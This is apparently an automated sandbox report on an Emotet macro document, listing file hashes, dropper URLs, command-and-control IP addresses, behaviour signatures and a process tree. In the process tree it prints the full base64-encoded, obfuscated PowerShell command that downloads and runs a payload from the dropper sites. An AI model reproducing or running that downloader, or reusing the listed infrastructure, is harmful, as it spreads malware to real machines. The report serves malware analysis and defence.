Analysis

  • max time kernel
    55s
  • max time network
    59s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    12-01-2021 03:38

General

  • Target

    emotet_e2_52cdb3dc05a42a52f343730843e9c398f0580cb85bb1219b4ec4b1757f6adebd_2021-01-12__033731059825._fpx.doc

  • Size

    186KB

  • MD5

    0b55b9f8ad6fa355095fa3262a9cf3d4

  • SHA1

    2a447df6e9d369dfe604de252a9f79c445a1e760

  • SHA256

    858159295a83a85ce85a8e18a4398873eb02dfa32012325f963ab2de57c8c0aa

  • SHA512

    9bbe41a96c443544d1d114991c9a3898a230ad9a7024f0d31f2b9a7677f0725ecb3b451f7dcc908eb20c7ea053ec8c0ff7038ec18bf57f5b64c1a9f0f91d967a

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://pipesplumbingltd.com/DB/Yg2rsTn/

exe.dropper

http://annabphotography.co.uk/wp-includes/WdHO/

exe.dropper

http://childselect.com/cgi-bin/BSA/

exe.dropper

http://movie-2free.com/cgi-bin/F/

exe.dropper

https://sachcodoc.net/wp-admin/pOyZDC/

exe.dropper

http://aramisconstruct.ro/wp-admin/Hpbd6/

exe.dropper

https://manweikeji.com/wp-content/X/

exe.dropper

http://farmapleland.com/wp-content/F/

Extracted

Family

emotet

Botnet

Epoch2

C2

102.182.145.130:80

173.173.254.105:80

64.207.182.168:8080

51.89.199.141:8080

167.114.153.111:8080

173.63.222.65:80

218.147.193.146:80

59.125.219.109:443

172.104.97.173:8080

190.162.215.233:80

68.115.186.26:80

78.188.106.53:443

190.240.194.77:443

24.133.106.23:80

80.227.52.78:80

79.137.83.50:443

120.150.218.241:443

62.171.142.179:8080

194.4.58.192:7080

62.30.7.67:443

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Emotet Payload 4 IoCs

    Detects Emotet payload in memory.

  • Blocklisted process makes network request 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e2_52cdb3dc05a42a52f343730843e9c398f0580cb85bb1219b4ec4b1757f6adebd_2021-01-12__033731059825._fpx.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:728
  • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
    POwersheLL -windowstyle hidden -ENCOD cwBlAHQALQBpAFQARQBNACAAIAB2AGEAcgBJAGEAQgBMAGUAOgBaADUAUABPACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiAC0AZgAgACcARQBjAHQAJwAsACcAcwBZAFMAdABFAG0ALgBpACcALAAnAE8AcgBZACcALAAnAG8ALgBEAGkAcgAnACkAIAApACAAOwAgACAAIABTAEUAVAAtAGkAdABFAG0AIAAgACgAIgB2AEEAcgAiACsAIgBpAGEAYgBMACIAKwAiAEUAOgBRADQANwAiACkAIAAgACgAIAAgAFsAVABZAFAAZQBdACgAIgB7ADUAfQB7ADIAfQB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQAiAC0ARgAgACcAYQBOAEEARwBlACcALAAnAE4ARQBUAC4AcwAnACwAJwAuACcALAAnAEUAcgBWAGkAYwBFAFAATwBpAE4AVABNACcALAAnAFIAJwAsACcAUwBZAHMAVABlAG0AJwApACAAKQAgADsAJABRADkAZABpAHcAawBxAD0AKAAnAE4ANQAnACsAKAAnAGgAJwArACcAXwBkAHcAMgAnACkAKQA7ACQASQB2AHYAZAB2AGQAbwA9ACQAVQAzAHMAZgB0AGIAawAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUwBsADMAOQA5ADAANwA7ACQAVABtAHIAeABhAGYAYwA9ACgAJwBNAGcAJwArACgAJwAyAGwAdAAxACcAKwAnAHcAJwApACkAOwAgACQAWgA1AHAATwA6ADoAIgBjAGAAUgBFAEEAdABlAGAAZABJAFIARQBDAHQAYABvAFIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcASABFACcAKwAnAHgAUQAnACkAKwAoACcAOAA0AGoAJwArACcAZQAyACcAKQArACcAegAnACsAKAAnAEgAJwArACcARQB4AFkAZwBoAGIAJwArACcAOQAxADUASAAnACkAKwAnAEUAeAAnACkALgAiAFIAZQBwAGwAYABBAGMAZQAiACgAKABbAGMAaABhAFIAXQA3ADIAKwBbAGMAaABhAFIAXQA2ADkAKwBbAGMAaABhAFIAXQAxADIAMAApACwAWwBzAHQAUgBpAG4ARwBdAFsAYwBoAGEAUgBdADkAMgApACkAKQA7ACQASwB6AGkAZwBoAHoAegA9ACgAKAAnAFIAagAnACsAJwB0ACcAKQArACgAJwBrAHQAcwAnACsAJwB6ACcAKQApADsAIAAgACgAIAAgAGcAaQAgACAAKAAiAHYAYQByACIAKwAiAGkAQQBiAGwAIgArACIARQA6AHEANAA3ACIAKQAgACkALgB2AEEAbAB1AGUAOgA6ACIAUwBlAEMAVQByAEkAYABUAFkAYABQAFIAYABPAGAAVABvAEMAbwBMACIAIAA9ACAAKAAoACcAVAAnACsAJwBsAHMAJwApACsAJwAxADIAJwApADsAJABZAHcAaQAyAGUAZQByAD0AKAAoACcAUwAnACsAJwBmAHkAJwArACcAbQBrADAAJwApACsAJwBrACcAKQA7ACQAUABnAHAAZQBiAG0AawAgAD0AIAAoACgAJwBTAG8AdABpADEAJwArACcAMQAnACkAKwAnAG8AJwArACcAYwB5ACcAKQA7ACQAWgAyAHgAMwA1ADAAcwA9ACgAKAAnAEoAJwArACcAOQByACcAKQArACgAJwA2AGkAawAnACsAJwBpACcAKQApADsAJABNAGMAYQBtAGwAegAwAD0AKAAoACcATwAnACsAJwBlADAAcQA1ACcAKQArACcAaQBoACcAKQA7ACQAVABzAHgAdAB1AHkAegA9ACQASABPAE0ARQArACgAKAAnAHsAMAAnACsAJwB9AFEAOAA0ACcAKwAnAGoAZQAnACsAJwAyAHoAewAwACcAKwAnAH0AWQBnACcAKwAnAGgAYgA5ADEANQB7ADAAfQAnACkALQBmACAAIABbAEMAaABhAFIAXQA5ADIAKQArACQAUABnAHAAZQBiAG0AawArACgAJwAuACcAKwAoACcAZQB4ACcAKwAnAGUAJwApACkAOwAkAEMAagBlADEAYQA5AGwAPQAoACgAJwBWAGMAdgAnACsAJwBuACcAKQArACcAcwA2ACcAKwAnAGcAJwApADsAJABIAHgAcQB1ADMAMwBqAD0AJgAoACcAbgAnACsAJwBlAHcALQAnACsAJwBvAGIAagBlAGMAdAAnACkAIABuAGUAVAAuAFcARQBiAEMAbABpAEUATgB0ADsAJABKAHgAcwAzAGkAbgA2AD0AKAAnAGgAJwArACgAJwB0AHQAJwArACcAcAAnACkAKwAoACcAcwAnACsAJwA6ACcAKwAnAF0AWwAoAHMAKQBdAHcAXQAnACsAJwBbACgAcwAnACsAJwApACcAKQArACgAJwBdACcAKwAnAHcAcAAnACkAKwAnAGkAJwArACgAJwBwAGUAcwAnACsAJwBwAGwAdQAnACkAKwAnAG0AJwArACcAYgBpACcAKwAoACcAbgAnACsAJwBnACcAKwAnAGwAdABkAC4AJwApACsAKAAnAGMAbwAnACsAJwBtAF0AWwAnACkAKwAoACcAKABzACkAJwArACcAXQAnACkAKwAnAHcAJwArACgAKAAnAEQAQgBdAFsAJwArACcAKAAnACkAKQArACcAcwAnACsAJwApACcAKwAoACcAXQB3AFkAZwAnACsAJwAyACcAKQArACgAJwByAHMAJwArACcAVABuAF0AJwApACsAKAAnAFsAKABzACkAJwArACcAXQAnACkAKwAoACcAdwBAAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACsAKAAnADoAXQBbACcAKwAnACgAcwApAF0AJwArACcAdwAnACsAJwBdAFsAJwApACsAKAAnACgAcwApACcAKwAnAF0AdwAnACsAJwBhACcAKQArACcAbgBuACcAKwAoACcAYQBiAHAAaABvACcAKwAnAHQAbwAnACsAJwBnAHIAYQBwAGgAeQAnACsAJwAuACcAKwAnAGMAbwAuAHUAJwArACcAawAnACkAKwAnAF0AWwAnACsAKAAnACgAJwArACcAcwApACcAKQArACgAJwBdAHcAJwArACcAdwAnACkAKwAnAHAALQAnACsAKAAnAGkAJwArACcAbgBjAGwAdQBkAGUAJwApACsAJwBzACcAKwAoACgAJwBdAFsAKAAnACsAJwBzACcAKQApACsAKAAoACcAKQBdAHcAVwBkACcAKwAnAEgATwAnACsAJwBdACcAKQApACsAKAAoACcAWwAoACcAKwAnAHMAJwApACkAKwAoACgAJwApAF0AJwArACcAdwBAAGgAJwArACcAdAAnACkAKQArACgAJwB0AHAAOgAnACsAJwBdAFsAJwArACcAKABzACkAXQB3ACcAKwAnAF0AWwAoAHMAKQBdAHcAJwArACcAYwBoACcAKQArACgAJwBpACcAKwAnAGwAZAAnACkAKwAoACcAcwBlAGwAJwArACcAZQAnACkAKwAnAGMAdAAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtACcAKwAnAF0AJwArACgAJwBbACgAcwAnACsAJwApAF0AJwApACsAKAAnAHcAJwArACcAYwBnACcAKQArACgAJwBpACcAKwAnAC0AYgBpACcAKQArACgAKAAnAG4AXQBbACcAKwAnACgAJwApACkAKwAnAHMAJwArACgAKAAnACkAXQAnACsAJwB3ACcAKQApACsAKAAnAEIAUwAnACsAJwBBACcAKQArACgAJwBdAFsAJwArACcAKABzACcAKwAnACkAXQB3ACcAKQArACgAJwBAAGgAdAB0AHAAOgBdACcAKwAnAFsAJwApACsAJwAoACcAKwAoACgAJwBzACcAKwAnACkAXQB3ACcAKQApACsAKAAnAF0AWwAoAHMAKQAnACsAJwBdACcAKwAnAHcAbQBvAHYAaQAnACkAKwAoACcAZQAtACcAKwAnADIAZgAnACsAJwByAGUAZQAuAGMAJwArACcAbwBtAF0AJwApACsAJwBbACcAKwAoACcAKABzACcAKwAnACkAXQB3AGMAJwApACsAKAAnAGcAaQAnACsAJwAtAGIAJwApACsAJwBpAG4AJwArACcAXQBbACcAKwAoACcAKABzACcAKwAnACkAJwApACsAKAAnAF0AdwAnACsAJwBGACcAKwAnAF0AWwAnACsAJwAoACcAKwAnAHMAKQBdAHcAQABoAHQAJwApACsAKAAnAHQAcAAnACsAJwBzADoAJwApACsAKAAoACcAXQBbACcAKwAnACgAcwAnACkAKQArACgAKAAnACkAXQB3AF0AWwAoACcAKwAnAHMAJwArACcAKQBdACcAKQApACsAJwB3ACcAKwAoACcAcwAnACsAJwBhAGMAaAAnACkAKwAnAGMAJwArACcAbwAnACsAKAAnAGQAbwBjAC4AbgBlAHQAJwArACcAXQAnACsAJwBbACcAKQArACcAKAAnACsAJwBzACcAKwAnACkAJwArACgAJwBdACcAKwAnAHcAdwAnACkAKwAoACcAcAAtACcAKwAnAGEAZABtAGkAbgAnACkAKwAoACcAXQBbACgAcwApAF0AJwArACcAdwBwAE8AJwApACsAKAAnAHkAWgBEAEMAXQBbACgAcwApACcAKwAnAF0AdwAnACsAJwBAACcAKQArACcAaAB0ACcAKwAoACcAdABwADoAXQAnACsAJwBbACcAKwAnACgAcwApACcAKQArACgAJwBdAHcAXQBbACgAcwApAF0AdwAnACsAJwBhAHIAYQBtAGkAJwArACcAcwAnACsAJwBjAG8AbgBzAHQAJwApACsAJwByAHUAJwArACgAJwBjAHQAJwArACcALgByAG8AJwApACsAKAAoACcAXQBbACcAKwAnACgAJwApACkAKwAoACgAJwBzACcAKwAnACkAXQB3ACcAKQApACsAKAAnAHcAcAAtACcAKwAnAGEAJwArACcAZABtAGkAJwArACcAbgBdAFsAKABzACkAJwArACcAXQAnACkAKwAoACcAdwBIACcAKwAnAHAAYgBkADYAJwApACsAJwBdAFsAJwArACgAJwAoAHMAKQAnACsAJwBdACcAKQArACgAKAAnAHcAQABoACcAKwAnAHQAdAAnACsAJwBwAHMAOgBdAFsAJwArACcAKAAnACkAKQArACgAKAAnAHMAJwArACcAKQBdACcAKQApACsAKAAnAHcAJwArACcAXQBbACcAKQArACgAJwAoAHMAKQBdACcAKwAnAHcAbQBhACcAKQArACgAJwBuACcAKwAnAHcAZQAnACkAKwAnAGkAJwArACcAawBlACcAKwAnAGoAaQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACgAJwBtACcAKwAnAF0AWwAnACkAKwAnACgAJwArACgAKAAnAHMAKQBdAHcAdwAnACsAJwBwACcAKQApACsAKAAnAC0AYwAnACsAJwBvACcAKQArACgAJwBuAHQAJwArACcAZQAnACsAJwBuACcAKwAnAHQAXQBbACgAcwApACcAKQArACcAXQAnACsAKAAnAHcAWABdACcAKwAnAFsAJwApACsAKAAnACgAcwAnACsAJwApAF0AdwBAAGgAJwArACcAdAB0AHAAJwArACcAOgAnACsAJwBdAFsAKABzACkAJwApACsAKAAnAF0AJwArACcAdwBdACcAKQArACgAJwBbACcAKwAnACgAcwApACcAKQArACgAJwBdACcAKwAnAHcAZgAnACkAKwAnAGEAJwArACgAJwByAG0AYQBwAGwAJwArACcAZQBsACcAKwAnAGEAbgBkACcAKQArACgAJwAuAGMAbwAnACsAJwBtACcAKwAnAF0AWwAoAHMAKQBdACcAKQArACgAJwB3AHcAcAAnACsAJwAtAGMAJwApACsAKAAnAG8AbgB0AGUAbgB0AF0AJwArACcAWwAnACkAKwAoACgAJwAoAHMAJwApACkAKwAnACkAJwArACgAKAAnAF0AJwArACcAdwBGAF0AWwAoACcAKQApACsAKAAoACcAcwApAF0AJwArACcAdwAnACkAKQApAC4AIgByAGUAUABgAGwAQQBDAEUAIgAoACgAKAAnAF0AWwAoAHMAJwArACcAKQAnACkAKwAnAF0AdwAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAHgAJwArACcAdwBlACcAKQApAFsAMABdACkALgAiAHMAYABQAGwAaQBUACIAKAAkAEEAZQBpAG0AYwBsAHUAIAArACAAJABJAHYAdgBkAHYAZABvACAAKwAgACQAVQBjAGgAMQBhAGMAbgApADsAJABTAGwAMwAwAGcAcwB2AD0AKAAnAFQAJwArACgAJwBsACcAKwAnAHMAagBkAHcAJwApACsAJwBiACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATwA5AG4AeQB3AHcAXwAgAGkAbgAgACQASgB4AHMAMwBpAG4ANgApAHsAdAByAHkAewAkAEgAeABxAHUAMwAzAGoALgAiAGQAbwB3AE4ATABgAE8AQQBgAEQARgBgAGkATABlACIAKAAkAE8AOQBuAHkAdwB3AF8ALAAgACQAVABzAHgAdAB1AHkAegApADsAJABZADEAcAAxAF8ANwBlAD0AKAAnAFMANgAnACsAKAAnADkAJwArACcAOQAxAHcAMQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdAAnACsAJwBlAG0AJwApACAAJABUAHMAeAB0AHUAeQB6ACkALgAiAEwAYABFAG4AZwBUAGgAIgAgAC0AZwBlACAANAA1ADQANQA1ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAoACcAdwBpACcAKwAoACcAbgAnACsAJwAzADIAXwBQAHIAbwBjAGUAJwApACsAJwBzAHMAJwApACkALgAiAEMAcgBFAGAAQQB0AGUAIgAoACQAVABzAHgAdAB1AHkAegApADsAJABMAHgAaABjAGgAYwB0AD0AKAAnAFIAJwArACgAJwB2ACcAKwAnADIANABsACcAKQArACcAaABoACcAKQA7AGIAcgBlAGEAawA7ACQATQAzAGsAeAB5AGcANgA9ACgAKAAnAEEAagBtAHUAeAAnACsAJwA1ACcAKQArACcAZgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFQAdQB5ADAANQB4ADIAPQAoACcAWABnACcAKwAnAGwAawAnACsAKAAnAG4AJwArACcAXwBvACcAKQApAA==
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:3680
  • C:\Users\Admin\Q84je2z\Yghb915\Soti11ocy.exe
    C:\Users\Admin\Q84je2z\Yghb915\Soti11ocy.exe
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Suspicious use of WriteProcessMemory
    PID:3920
    • C:\Windows\SysWOW64\UIAutomationCore\CameraCaptureUI.exe
      "C:\Windows\SysWOW64\UIAutomationCore\CameraCaptureUI.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:4088
  • \??\c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NgcSvc
    1⤵
      PID:1580
    • \??\c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DeviceAssociationService
      1⤵
        PID:3580
      • \??\c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s NgcCtnrSvc
        1⤵
        • Modifies data under HKEY_USERS
        PID:1980

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Discovery

      Query Registry

      2
      T1012

      System Information Discovery

      2
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\Q84je2z\Yghb915\Soti11ocy.exe
        MD5

        d57f6b54e09ffbad60f4cfe402fa414e

        SHA1

        3d205115e34e49ecb9eac25a091719dccfb51f34

        SHA256

        3022b0e8131fd440b48e90ec33d936d228008ec09e3748ac3a2d691725d4fc7a

        SHA512

        8a806236b3ebde89cd2c538d070f50f41b61b5516fb8e031f8cb2becfb636fd8024e4f359aad0a2bb61fb39b333791a5f78b28549e25c60dd393cbec80d32be0

      • C:\Users\Admin\Q84je2z\Yghb915\Soti11ocy.exe
        MD5

        d57f6b54e09ffbad60f4cfe402fa414e

        SHA1

        3d205115e34e49ecb9eac25a091719dccfb51f34

        SHA256

        3022b0e8131fd440b48e90ec33d936d228008ec09e3748ac3a2d691725d4fc7a

        SHA512

        8a806236b3ebde89cd2c538d070f50f41b61b5516fb8e031f8cb2becfb636fd8024e4f359aad0a2bb61fb39b333791a5f78b28549e25c60dd393cbec80d32be0

      • C:\Windows\SysWOW64\UIAutomationCore\CameraCaptureUI.exe
        MD5

        d57f6b54e09ffbad60f4cfe402fa414e

        SHA1

        3d205115e34e49ecb9eac25a091719dccfb51f34

        SHA256

        3022b0e8131fd440b48e90ec33d936d228008ec09e3748ac3a2d691725d4fc7a

        SHA512

        8a806236b3ebde89cd2c538d070f50f41b61b5516fb8e031f8cb2becfb636fd8024e4f359aad0a2bb61fb39b333791a5f78b28549e25c60dd393cbec80d32be0

      • memory/728-2-0x00007FF99AF10000-0x00007FF99B547000-memory.dmp
        Filesize

        6.2MB

      • memory/3680-3-0x00007FF994150000-0x00007FF994B3C000-memory.dmp
        Filesize

        9.9MB

      • memory/3680-4-0x00000169772E0000-0x00000169772E1000-memory.dmp
        Filesize

        4KB

      • memory/3680-5-0x0000016977510000-0x0000016977511000-memory.dmp
        Filesize

        4KB

      • memory/3920-8-0x0000000002EC0000-0x0000000002EF4000-memory.dmp
        Filesize

        208KB

      • memory/3920-9-0x0000000002F00000-0x0000000002F33000-memory.dmp
        Filesize

        204KB

      • memory/4088-10-0x0000000000000000-mapping.dmp
      • memory/4088-12-0x0000000000DD0000-0x0000000000E04000-memory.dmp
        Filesize

        208KB

      • memory/4088-13-0x0000000000E30000-0x0000000000E63000-memory.dmp
        Filesize

        204KB